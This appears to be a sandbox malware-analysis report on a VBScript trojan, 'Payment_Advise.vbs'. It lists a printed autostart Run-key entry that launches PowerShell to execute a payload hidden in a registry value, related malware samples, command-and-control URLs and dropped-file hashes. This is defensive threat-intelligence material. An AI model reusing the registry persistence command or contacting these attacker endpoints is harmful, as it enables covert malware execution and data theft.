                                                          Sample name:Payment_Advise.vbs
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.expl.evad.winVBS@15/13@6/5
                                                          EGA Information:
                                                          • Successful, ratio: 33.3%
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 123
                                                          • Number of non-executed functions: 129
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .vbs
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.199.214.10, 4.245.163.56, 13.85.23.206
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 6652 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          14:15:20API Interceptor1x Sleep call for process: wscript.exe modified
                                                          14:15:33API Interceptor82x Sleep call for process: powershell.exe modified
                                                          14:15:51API Interceptor2x Sleep call for process: svchost.exe modified
                                                          14:16:37API Interceptor4625x Sleep call for process: msiexec.exe modified
                                                          18:16:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Faderskabernes %Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)
                                                          18:16:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Faderskabernes %Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.2204500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            WizClient.exeGet hashmaliciousXWormBrowse
                                                              1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                #U0420#U0430#U0442#U043a#U0430.exeGet hashmaliciousXWormBrowse
                                                                  https://nr.chadwickbarros.cl/Get hashmaliciousUnknownBrowse
                                                                    R9rwNLVzpr.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                      nobtpajdjthawd.exeGet hashmaliciousKeyzetsu ClipperBrowse
                                                                        KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse
                                                                          Solara Executor.exeGet hashmaliciousXWormBrowse
                                                                            RFQ.exeGet hashmaliciousDarkCloudBrowse
                                                                              104.21.112.1CQDNwLUdY4.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rbopisalive.cyou/2dxw/
                                                                              sY8Sfsplzf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
                                                                              gbdXRnNKkm.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rbopisalive.cyou/a669/
                                                                              JOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                                                                              • touxzw.ir/sccc/five/fre.php
                                                                              jzqc1V4NqB.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rbopisalive.cyou/a669/?WBuDj=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9qlITGUdXxZLx5IMa8uxv5i9osOS22A==&Jzwht=FNiD
                                                                              CP07E1clp1.exeGet hashmaliciousFormBookBrowse
                                                                              • www.fz977.xyz/406r/
                                                                              2Stejb80vJ.exeGet hashmaliciousFormBookBrowse
                                                                              • www.askvtwv8.top/uztg/
                                                                              Shipment_Docus_COSCO_20250307_35405649_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                              • touxzw.ir/sccc/five/fre.php
                                                                              ORDER-000291-XLSX.exeGet hashmaliciousLokibotBrowse
                                                                              • touxzw.ir/tking3/five/fre.php
                                                                              Quotation_Order_Request_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                              • touxzw.ir/sccc/five/fre.php
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              bg.microsoft.map.fastly.netHAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xlsGet hashmaliciousUnknownBrowse
                                                                              • 199.232.210.172
                                                                              Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Document.xlsGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 199.232.210.172
                                                                              ORDEM DE COMPRA.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              B32leNmDKJ.exeGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              internalinfrastructuremainoffice-7.0.2317-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 199.232.214.172
                                                                              svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 199.232.210.172
                                                                              reallyfreegeoip.org4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.48.1
                                                                              QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                              • 104.21.16.1
                                                                              PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.64.1
                                                                              Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.96.1
                                                                              MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.48.1
                                                                              file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.96.1
                                                                              api.telegram.org4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              WizClient.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              #U0420#U0430#U0442#U043a#U0430.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              https://nr.chadwickbarros.cl/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              R9rwNLVzpr.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                              • 149.154.167.220
                                                                              nobtpajdjthawd.exeGet hashmaliciousKeyzetsu ClipperBrowse
                                                                              • 149.154.167.220
                                                                              KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse
                                                                              • 149.154.167.220
                                                                              Solara Executor.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              RFQ.exeGet hashmaliciousDarkCloudBrowse
                                                                              • 149.154.167.220
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              TELEGRAMRU4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              M1gP5m86Gn.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              DEVM24-clean.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              WizClient.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              kumori.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              ShadowLoader.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              TEDGRQXB.exeGet hashmaliciousVidarBrowse
                                                                              • 149.154.167.99
                                                                              Nexol.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              IRANHOST-ASIRFJh11FyY6R.exeGet hashmaliciousPonyBrowse
                                                                              • 185.10.75.3
                                                                              RFQ-2402-3572.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 185.10.73.42
                                                                              PO76389.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 185.10.73.42
                                                                              400 EUR.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 185.10.75.14
                                                                              vxJjLEvhQU.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 185.10.75.14
                                                                              JL57A9eH82.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 185.10.75.14
                                                                              BECERRA_LTDA_PT63678388493494748832472743274747274727.scr.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 185.10.75.14
                                                                              FACTURE_A23.4618_NOUVELLE_MATURITE.scr.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 185.10.75.14
                                                                              VLLC2023-0135_Procurment_CJSC05.09.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 185.10.75.14
                                                                              rEncomendaFornecedor1059.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 185.10.75.14
                                                                              ORACLE-BMC-31898US4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                              • 193.122.6.168
                                                                              Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              cbr.m68k.elfGet hashmaliciousMiraiBrowse
                                                                              • 144.25.156.103
                                                                              file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              http://account.hrblock.comGet hashmaliciousUnknownBrowse
                                                                              • 130.61.120.2
                                                                              #rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              PAGOS RETRASADOS.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              CLOUDFLARENETUS4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              Robert Martin shared _Clarion Security _ with you {Ref _8589}.emlGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                              • 104.18.35.178
                                                                              DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.48.1
                                                                              https://check.tefee.icu/gkcxv.google?i=ee24ce31-7ff2-4ac9-8683-49d2f7670b48%20#%20''I%20am%20not%20a%20'robot'%20-%20%D0%B3e%D0%A1%D0%90%D0%A0%D0%A2%D0%A1%D0%9D%D0%90%20Verification%20ID:%203259''Get hashmaliciousUnknownBrowse
                                                                              • 104.21.80.1
                                                                              signed contract 01.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.68.120
                                                                              https://www.deliveryoka.com/webservice_ionic/captchav2.html?vvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                              • 1.1.1.1
                                                                              Document.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.68.120
                                                                              signed contract 01.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.68.120
                                                                              DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.148.163
                                                                              Document.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.68.120
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9ad4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.112.1
                                                                              PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.112.1
                                                                              MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.112.1
                                                                              file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.112.1
                                                                              file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.112.1
                                                                              R9rwNLVzpr.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                              • 104.21.112.1
                                                                              3b5074b1b5d032e5620f69f9f700ff0e4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              aXeuKjNXAK.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              Venom.6.0.3.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              worm xenon___.batGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              File-My-Isekai-Hotel-Build-a-Hotel-and-Create_283939.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              file.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              WizClient.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              TOUR_PACKAGE.vbeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              • 185.10.75.23
                                                                              37f463bf4616ecd445d4a1937da06e194500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 185.10.75.23
                                                                              comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 185.10.75.23
                                                                              comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 185.10.75.23
                                                                              yJLckVp9HE.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                              • 185.10.75.23
                                                                              yJLckVp9HE.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.10.75.23
                                                                              DTSSymmetryDLL.dll.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                              • 185.10.75.23
                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.10.75.23
                                                                              TEDGRQXB.exeGet hashmaliciousVidarBrowse
                                                                              • 185.10.75.23
                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.10.75.23
                                                                              scripthook.zipGet hashmaliciousUnknownBrowse
                                                                              • 185.10.75.23
                                                                              No context
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.4932237986071223
                                                                              Encrypted:false
                                                                              SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztae:cJhXC9lHmutpJyiRDeJ/aUKrDgnmE
                                                                              MD5:58E9153C0BAD1BE510A0FE27E75D90D7
                                                                              SHA1:D31B6D9627266BD4FCD50F8806732B73835B9553
                                                                              SHA-256:391BA2397EF6642B6C6AE568B37053E8B83741126C86023328C15260120DC0EB
                                                                              SHA-512:1D8AE52B3FFF8536F6B2A8AD632CE92489DE37C1E417F7E730914391B29A3F2EA2ECA2573EBA05D17A4098B6C565205EDFB27DCC04857960E045CEB974065623
                                                                              Malicious:false
                                                                              Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xaaad1651, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7216819459910037
                                                                              Encrypted:false
                                                                              SSDEEP:1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi
                                                                              MD5:3AAA623996754B534E2FCE9613472AC0
                                                                              SHA1:6300CC44A2A6EB5760EF598C487CA7B94BD952D9
                                                                              SHA-256:D661E4C85C2CBF9536D710E4779ED4951BFA7C4C4C3D6243840FCE540773FAA2
                                                                              SHA-512:2A609E8DB696B246CB4DDCB77F069BFC1C2E4A03F3DCA682058668CCA66B204C56D3ADCEF80EFA063E0EAC0556B649108F7879E7BAEBF0FDCE77A814CD16534B
                                                                              Malicious:false
                                                                              Preview:...Q... ...............X\...;...{......................p.D..........{}.3....}#.h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{.................................._<g.3....}C=................Liz.3....}C..........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.08095977237166742
                                                                              Encrypted:false
                                                                              SSDEEP:3:pKS/yYehMpmYegps6/fgsCrZClW/tUilltall+SHY/Xl+/rQLve:Adzhchxfgs3GFeAS4M
                                                                              MD5:53EB32A62948FC1698DB89C69F35BB0E
                                                                              SHA1:020319CDC644F699A01E4DAA1B7B2FAC428CEAAF
                                                                              SHA-256:BD498B8FBC425C0244F0DCBA8B3C50A9585EC360F4D5E24EB8088A013EA6730A
                                                                              SHA-512:6DB410B6A252C0472864D2DA36264AFB371881C35519757CBD60BB3C2A45A3DBEF6B7ECFD7AC65172310C5E1EF74B2E2E699C8D412E9B69A618C3BFA246B58E7
                                                                              Malicious:false
                                                                              Preview:.C......................................;...{..3....}C......{}..............{}......{}.vv_Q.....{}.................Liz.3....}C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):73305
                                                                              Entropy (8bit):7.996028107841645
                                                                              Encrypted:true
                                                                              SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                                              MD5:83142242E97B8953C386F988AA694E4A
                                                                              SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                                              SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                                              SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                                              Malicious:false
                                                                              Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):330
                                                                              Entropy (8bit):3.27124201245894
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKxpfa3/ImcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:rfaPImfZkPlE99SNxAhUeq8S
                                                                              MD5:F059BE98BB662F3E132D70AE0409B2AA
                                                                              SHA1:A9F0552305A4DE0F37FE18B70EF32402BA350FB0
                                                                              SHA-256:BB0D0B3EA7CD8887A196B20B51841329ABD50B48495747609C512211A427FA13
                                                                              SHA-512:A3B010FEF20F3C1D86046936A0E7082DB4678F7C9C4FDB5A037AB4298574972FF08932F0DA96A77336C08C636A0B36BF197B18CD71C3128E1BA55DB06888357A
                                                                              Malicious:false
                                                                              Preview:p...... ........kb..z...(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8003
                                                                              Entropy (8bit):4.840877972214509
                                                                              Encrypted:false
                                                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                              MD5:106D01F562D751E62B702803895E93E0
                                                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1628158735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                                              MD5:3A925CB766CE4286E251C26E90B55CE8
                                                                              SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                                              SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                                              SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
